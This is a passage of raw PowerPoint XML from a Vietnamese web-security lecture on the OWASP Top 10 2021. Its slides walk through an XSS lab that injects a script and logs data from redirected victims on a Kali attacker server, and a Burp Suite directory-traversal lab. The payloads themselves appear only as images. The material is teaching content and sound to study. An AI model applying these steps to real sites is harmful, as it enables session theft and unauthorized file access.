            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25EEEF5-6AE3-45EA-741A-5A94EF33C772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="266700"/>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Khởi chạy dịch vụ web của máy Kali máy tấn công. Phân quyền cho đọc ghi cho file log.txt.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Sau khi đã vào được trang cho phép tiêm payload , gửi đoạn script sau vào payload để trình duyệt thực thi mã</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346962E0-9FA6-A6D4-A3F9-A061100042CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="344156" y="2848786"/>
            <a:ext cx="8455688" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3885741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B52B0-484E-1A2D-C5B0-43878779ED4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C9A1C1-52EA-FB93-7953-FD7EA088C512}"/>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69B2975-0509-60F6-6955-AEF47D6F7C18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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C26CFCAF-8B72-FF2F-9D24-D27E817DBBB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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3FD377A-997D-EBF8-4E34-C50D4BE0FA4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1877594"/>
            <a:ext cx="4106562" cy="287514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Phiên bản OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> cho thấy các cuộc tấn công nhắm vào điểm yếu ở cấp độ kiến trúc, thiết kế và quy trình.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6150" name="Picture 6" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB6EFB5-1609-71FD-A181-816DD7843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502" y="1536085"/>
            <a:ext cx="4250885" cy="417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267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E5630-059E-E14E-BC2C-BF74BC66F94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A126D72-6EDB-B4B2-D6D9-2D79AE2933D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B2AC4043-F0D7-3464-636F-D9200E06C1A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160</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36558BEB-355C-8FE4-1B38-A6844DE9429D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11430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Truyền mã javascript vào trường nhập liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB05D0B8-B253-9BBB-2772-A9727CF9DCCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746125" y="1090171"/>
            <a:ext cx="7651750" cy="3872878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25383790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8F09A-77E0-BB60-2894-6495F868970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18BC1AB-0CB2-8CCD-FBB0-B15A3FDFD98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977D418-9F35-6E9B-52C5-7133C9A93F23}"/>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161</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC294AF-E7AD-EA82-12DA-5D2D86CAA317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="266700"/>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Kết quả thu thập được khi người dùng truy cập vào trang web bị chuyển hướng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62D2BB0-9E53-729E-86A7-8DF97046BF0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="156950" y="1866900"/>
            <a:ext cx="8758450" cy="1859080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18095063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B62A4-343B-C6B2-12BA-9B8E92E1D1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5FA1E0C-1B1D-D2F1-DED9-67EE06E8B62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465A96B-61DE-7DBB-F7DA-C8A81B7882A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162</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D5AA72-58E0-CBCD-EB59-4EE6E7555AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31750" y="1181100"/>
            <a:ext cx="8915400" cy="113107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Mở Broser trên Burp Suite: </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Vào browser trên Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65D646B-FB32-CFC5-11EC-D58A35A823C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="105584"/>
            <a:ext cx="7051040" cy="1292662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.3.3.Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tranversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB0D198-2B33-20CA-915B-E42FB386A3C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819433" y="2312178"/>
            <a:ext cx="5505133" cy="3355634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16473284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7F507-FB3A-5043-5A6C-26F02297006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4EAAEF8-4814-ACB5-7553-927F510B14C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E2F2C1E-8C4A-C4AF-03CB-4AA0CFD68D4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163</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD3ADE4D-7E52-B56D-AA84-328FC127FB6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Vào trang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>web thí nghiệm demo tấn công Directory Tranversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> của Burp Suite như trong hình, sau đó </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ACCESS THE LAB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để demo: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBD9D80C-7945-7397-0D70-7051D957FE51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="60410" y="1561397"/>
            <a:ext cx="9023180" cy="3930423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17440861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CDF4D-A246-100F-1EEC-D2419E6F6E4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D79B03A-940A-7CA3-F596-64435656F54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EF1BC8B6-2B35-D1B8-5B66-1174E517A5B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164</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E597A1-B86F-4C64-E878-9D7CCF953880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Sau đó đăng nhập vào, nếu chưa có hãy create account, điền email vào và đăng nhập:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6803E3F0-CE9F-3F68-9C3D-BFB611DB5E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="172720" y="1454402"/>
            <a:ext cx="8606245" cy="4260598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30978687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21F50-D05A-18EF-8EF8-D22B830A70B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47DC2F9-F1A9-1988-1BAB-E2F5F80A0BD1}"/>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3D3865AC-C444-A6A5-A0A9-0A17961A0C0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165</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB6A79F-08A9-D109-F3E9-181DCF25C9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Sau khi đăng nhập thành công, sẽ đến được 1 shop online: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51721D8-9368-E252-7D83-18739D59641C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="608099" y="1353793"/>
            <a:ext cx="7735487" cy="4348507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11894649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A436-0DBE-DAD2-435F-D357C10C82D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327B541-A272-A4DC-DF97-608C0800AA0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C2EF931-EAEC-3C3D-B8F7-9FEDFD91AB0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166</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4A1E78-AC57-8269-7AF9-2D1E9D124ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>intercept off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để bật i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ntercept on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lên để hứng giữa đường truyền của máy mình và sever của shop:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4723EE86-9597-62D6-1EA2-A54F208B9129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353547" y="1239530"/>
            <a:ext cx="6244591" cy="4255918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25714258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266B-74FB-60BF-D82E-B848439AB1B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EFEFA7E-883E-5AEB-1D7C-AD9B720A467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E99F0321-18FA-4457-8913-CA471606997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167</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BC7E23-281D-9FED-3DC8-03BD8B697AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18143" y="188709"/>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Sau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> shop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sẽ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thái</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
